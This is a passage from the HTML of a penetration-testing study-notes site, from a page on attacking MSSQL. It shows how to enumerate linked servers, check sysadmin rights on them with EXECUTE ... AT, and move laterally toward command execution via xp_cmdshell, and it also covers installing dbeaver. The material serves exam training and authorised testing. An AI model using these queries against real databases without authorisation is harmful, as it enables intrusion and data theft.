</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeCreateGlobalPrivilege       Create global objects                     Enabled    
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   
</span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010>
</span></span></span><span style=display:flex><span><span style=color:#960050;background-color:#1e0010></span>NULL
</span></span></code></pre></div><p> </p><h2 id=communicate-with-other-databases-with-mssql>Communicate with Other Databases with MSSQL</h2><p><code>MSSQL</code> has a configuration option called <a href=https://docs.microsoft.com/en-us/sql/relational-databases/linked-servers/create-linked-servers-sql-server-database-engine rel=external>linked servers</a>. Linked servers are typically configured to enable the database engine to execute a Transact-SQL statement that includes tables in another instance of SQL Server, or another database product such as Oracle.</p><p>If we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server. Administrators can configure a linked server using credentials from the remote server. If those credentials have sysadmin privileges, we may be able to execute commands in the remote SQL instance. Let&rsquo;s see how we can identify and execute queries on linked servers.</p><h4 id=identify-linked-servers-in-mssql>Identify linked Servers in MSSQL</h4><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; SELECT srvname, isremote FROM sysservers
2&gt; GO

srvname                             isremote
---------------------------------- --------
DESKTOP-MFERMN4\SQLEXPRESS          1
10.0.0.12\SQLEXPRESS                0

(2 rows affected)</code></pre></div><p>As we can see in the query&rsquo;s output, we have the name of the server and the column <code>isremote</code>, where <code>1</code> means is a remote server, and <code>0</code> is a linked server. We can see <a href=https://docs.microsoft.com/en-us/sql/relational-databases/system-compatibility-views/sys-sysservers-transact-sql rel=external>sysservers Transact-SQL</a> for more information.</p><p>Next, we can attempt to identify the user used for the connection and its privileges. The <a href=https://docs.microsoft.com/en-us/sql/t-sql/language-elements/execute-transact-sql rel=external>EXECUTE</a> statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets (<code>[ ]</code>).</p><p>Attacking SQL Databases</p><div class="highlight wrap-code" dir=auto><pre tabindex=0><code class=language-cmd-session data-lang=cmd-session>1&gt; EXECUTE(&#39;select @@servername, @@version, system_user, is_srvrolemember(&#39;&#39;sysadmin&#39;&#39;)&#39;) AT [10.0.0.12\SQLEXPRESS]
2&gt; GO

------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\SQLEXPRESS     Microsoft SQL Server 2019 (RTM sa_remote                                1

(1 rows affected)</code></pre></div><p><strong>Note:</strong> If we need to use quotes in our query to the linked server, we need to use single double quotes to escape the single quote. To run multiples commands at once we can divide them up with a semi colon (;).</p><p>As we have seen, we can now execute queries with sysadmin privileges on the linked server. As <code>sysadmin</code>, we control the SQL Server instance. We can read data from any database or execute system commands with <code>xp_cmdshell</code>. This section covered some of the most common ways to attack SQL Server and MySQL databases during penetration testing engagements. There are other methods for attacking these database types as well as others, such as <a href=https://book.hacktricks.xyz/network-services-pentesting/pentesting-postgresql rel=external>PostGreSQL</a>, SQLite, Oracle, <a href=https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/buckets/firebase-database rel=external>Firebase</a>, and <a href=https://book.hacktricks.xyz/network-services-pentesting/27017-27018-mongodb rel=external>MongoDB</a> which will be covered in other modules. It is worth taking some time to read up on these database technologies and some of the common ways to attack them as well.</p><h4 id=gui-application>GUI Application</h4><p>Database engines commonly have their own GUI application. MySQL has <a href=https://dev.mysql.com/downloads/workbench/ rel=external>MySQL Workbench</a> and MSSQL has <a href=https://docs.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms rel=external>SQL Server Management Studio or SSMS</a>, we can install those tools in our attack host and connect to the database. SSMS is only supported in Windows. An alternative is to use community tools such as <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a>. <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a> is a multi-platform database tool for Linux, macOS, and Windows that supports connecting to multiple database engines such as MSSQL, MySQL, PostgreSQL, among others, making it easy for us, as an attacker, to interact with common database servers.</p><p>To install <a href=https://github.com/dbeaver/dbeaver rel=external>dbeaver</a> using a Debian package we can download the release .deb package from <a href=https://github.com/dbeaver/dbeaver/releases rel=external>https://github.com/dbeaver/dbeaver/releases</a> and execute the following command:</p><h4 id=install-dbeaver>Install dbeaver</h4><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>[!bash!]$ sudo dpkg -i dbeaver-&lt;version&gt;.deb
</span></span></code></pre></div><p>To start the application use:</p><h4 id=run-dbeaver>Run dbeaver</h4><div class="highlight wrap-code" dir=auto><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-shell-session data-lang=shell-session><span style=display:flex><span>[!bash!]$ dbeaver &amp;
</span></span></code></pre></div><p>To connect to a database, we will need a set of credentials, the target IP and port number of the database, and the database engine we are trying to connect to (MySQL, MSSQL, or another).</p><h4 id=video---connecting-to-mssql-db-using-dbeaver>Video - Connecting to MSSQL DB using dbeaver</h4><p>Click on the image below for a short video demonstration of connecting to an MSSQL database using <code>dbeaver</code>.</p><p><a href=#R-image-0b36e72dbd3d50e877124f8d65ec6543 class=lightbox-link><img alt=MSSQL class="lazy lightbox figure-image" loading=lazy src=../../resources/ConnectToMSSQL.jpg style=height:auto;width:auto></a>
<a href=javascript:history.back(); class=lightbox-back id=R-image-0b36e72dbd3d50e877124f8d65ec6543><img alt=MSSQL class="lazy lightbox lightbox-image" loading=lazy src=../../resources/ConnectToMSSQL.jpg></a></p><p> </p><p> </p><p> </p><p> </p><p> </p><footer class=footline></footer></article></div></main></div><aside id=R-sidebar class=default-animation><div id=R-header-topbar class=default-animation></div><div id=R-header-wrapper class=default-animation><div id=R-header class=default-animation><a id=R-logo class=R-default href=../../><div class=logo-title style=display:flex;align-items:center><img src=../../images/logo.png alt=Logo style=width:90px;height:80>
<span>DrakonOps</span></div></a></div><search><form action=../../search/index.html method=get><div class="searchbox default-animation"><button class=search-detail type=submit title="Search (CTRL+ALT+f)"><i class="fas fa-search"></i></button>
<label class=a11y-only for=R-search-by>Search</label>
<input data-search-input id=R-search-by name=search-by class=search-by type=search placeholder=Search...>
<button class=search-clear type=button data-search-clear title="Clear search"><i class="fas fa-times" title="Clear search"></i></button></div></form></search></div><div id=R-homelinks class="default-animation homelinks"><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-homelinks"><ul class="space collapsible-menu"><li data-nav-url=../../index.html><a class=padding href=../../index.html><i class="fa-fw fas fa-home"></i> Home</a></li></ul></div><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-headercontrols"><ul></ul></div><div class="R-menu-divider default-animation"><hr class=padding></div></div><div id=R-content-wrapper class=highlightable><div class="R-sidebarmenu R-shortcutmenu-main"><ul class="enlarge morespace collapsible-menu"><li class=parent data-nav-url=../../oscp-notes/index.html><input type=checkbox id=R-section-5f51e3ac21bcc264f305c28eac7484ea aria-controls=R-subsections-5f51e3ac21bcc264f305c28eac7484ea checked><label for=R-section-5f51e3ac21bcc264f305c28eac7484ea><i class="fa-fw fas fa-chevron-right"></i><span class=a11y-only>Submenu OSCP Notes</span></label><a class=padding href=../../oscp-notes/index.html>OSCP Notes<i class="fa-fw fas fa-check read-icon"></i></a><ul id=R-subsections-5f51e3ac21bcc264f305c28eac7484ea class=collapsible-menu><li data-nav-url=../../oscp-notes/main-methodology/index.html><a class=padding href=../../oscp-notes/main-methodology/index.html>main methodology<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/methodology/index.html><a class=padding href=../../oscp-notes/methodology/index.html>methodology<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/project/index.html><a class=padding href=../../oscp-notes/project/index.html>project<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/footprinting-and-finger-printing-web-apps/index.html><a class=padding href=../../oscp-notes/footprinting-and-finger-printing-web-apps/index.html>footprinting and finger printing web apps<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/nmap/index.html><a class=padding href=../../oscp-notes/nmap/index.html>nmap<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/go-busters/index.html><a class=padding href=../../oscp-notes/go-busters/index.html>Go busters<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/dns/index.html><a class=padding href=../../oscp-notes/dns/index.html>dns<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/smb/index.html><a class=padding href=../../oscp-notes/smb/index.html>smb<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/nfs/index.html><a class=padding href=../../oscp-notes/nfs/index.html>nfs<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/ftp/index.html><a class=padding href=../../oscp-notes/ftp/index.html>ftp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/smtp/index.html><a class=padding href=../../oscp-notes/smtp/index.html>smtp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/snmp/index.html><a class=padding href=../../oscp-notes/snmp/index.html>snmp<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/imap-and-pop/index.html><a class=padding href=../../oscp-notes/imap-and-pop/index.html>imap and pop<i class="fa-fw fas fa-check read-icon"></i></a></li><li class=active data-nav-url=../../oscp-notes/mssql/index.html><a class=padding href=../../oscp-notes/mssql/index.html>mssql<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/oracle-databases-tns/index.html><a class=padding href=../../oscp-notes/oracle-databases-tns/index.html>oracle databases TNS<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/ipmi/index.html><a class=padding href=../../oscp-notes/ipmi/index.html>IPMI<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/vhosts/index.html><a class=padding href=../../oscp-notes/vhosts/index.html>vhosts<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/web-attacks/index.html><a class=padding href=../../oscp-notes/web-attacks/index.html>Web Attacks<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/xss/index.html><a class=padding href=../../oscp-notes/xss/index.html>XSS<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/login-brute-force-wordlists/index.html><a class=padding href=../../oscp-notes/login-brute-force-wordlists/index.html>login brute force wordlists<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/crackmapexec/index.html><a class=padding href=../../oscp-notes/crackmapexec/index.html>crackmapexec<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/eum4linux/index.html><a class=padding href=../../oscp-notes/eum4linux/index.html>eum4linux<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/rpcclient/index.html><a class=padding href=../../oscp-notes/rpcclient/index.html>rpcclient<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/spwaning-shell/index.html><a class=padding href=../../oscp-notes/spwaning-shell/index.html>spwaning shell<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/file-transfers-windows/index.html><a class=padding href=../../oscp-notes/file-transfers-windows/index.html>File transfers windows<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/file-transfer-using-nc_ncat-and-rdp_winrm/index.html><a class=padding href=../../oscp-notes/file-transfer-using-nc_ncat-and-rdp_winrm/index.html>file transfer using nc_ncat and rdp_winrm<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/living-off-the-land-file-transfer/index.html><a class=padding href=../../oscp-notes/living-off-the-land-file-transfer/index.html>living off the land file transfer<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/transferring-files-with-code/index.html><a class=padding href=../../oscp-notes/transferring-files-with-code/index.html>Transferring Files with Code<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/privilige-escalation/index.html><a class=padding href=../../oscp-notes/privilige-escalation/index.html>privilige escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/linux-privilege-escalation/index.html><a class=padding href=../../oscp-notes/linux-privilege-escalation/index.html>linux privilege escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/windows-privilege-escalation/index.html><a class=padding href=../../oscp-notes/windows-privilege-escalation/index.html>Windows Privilege Escalation<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/pivoting_tunneling/index.html><a class=padding href=../../oscp-notes/pivoting_tunneling/index.html>Scanning the Pivot Target<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/the-active-directory/index.html><a class=padding href=../../oscp-notes/the-active-directory/index.html>The Active Directory<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/the-metasploit-framework/index.html><a class=padding href=../../oscp-notes/the-metasploit-framework/index.html>The Metasploit Framework<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/linux-remote-management/index.html><a class=padding href=../../oscp-notes/linux-remote-management/index.html>Linux Remote Management<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/rdp-and-windows-remote-management/index.html><a class=padding href=../../oscp-notes/rdp-and-windows-remote-management/index.html>RDP and winrm<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/file-transfers-linux/index.html><a class=padding href=../../oscp-notes/file-transfers-linux/index.html>File transfers Linux<i class="fa-fw fas fa-check read-icon"></i></a></li><li data-nav-url=../../oscp-notes/password-attacks/index.html><a class=padding href=../../oscp-notes/password-attacks/index.html>password attacks<i class="fa-fw fas fa-check read-icon"></i></a></li></ul></li></ul></div><div class="R-sidebarmenu R-shortcutmenu-shortcuts"><ul class="space collapsible-menu"></ul></div><div id=R-footer-margin></div><div class="R-menu-divider default-animation"><hr class=padding></div><div class="R-sidebarmenu R-shortcutmenu-footercontrols"><ul><li class=R-historyclearer><div class="padding menu-control"><i class="fa-fw fas fa-history"></i>
<span>&nbsp;</span><div class=control-style><button>Clear History</button></div><div class=clear></div></div></li></ul></div><div id=R-footer><p>Built with <a href=https://github.com/McShelby/hugo-theme-relearn title=love><i class="fas fa-heart"></i></a> by <a href=https://gohugo.io/>Hugo</a></p></div></div></aside><script src=../../DrakonOps/js/js-yaml/js-yaml.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-color.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-dispatch.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-drag.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-ease.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-interpolate.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-selection.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-timer.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-transition.min.js?1762045204 defer></script><script src=../../DrakonOps/js/d3/d3-zoom.min.js?1762045204 defer></script><script src=../../DrakonOps/js/mermaid/mermaid.min.js?1762045204 defer></script><script>window.relearn.themeUseMermaid=JSON.parse("{}")</script><script src=../../DrakonOps/js/clipboard/clipboard.min.js?1762045204 defer></script><script src=../../DrakonOps/js/perfect-scrollbar/perfect-scrollbar.min.js?1762045204 defer></script><script src=../../DrakonOps/js/theme.min.js?1762045204 defer></script></body></html>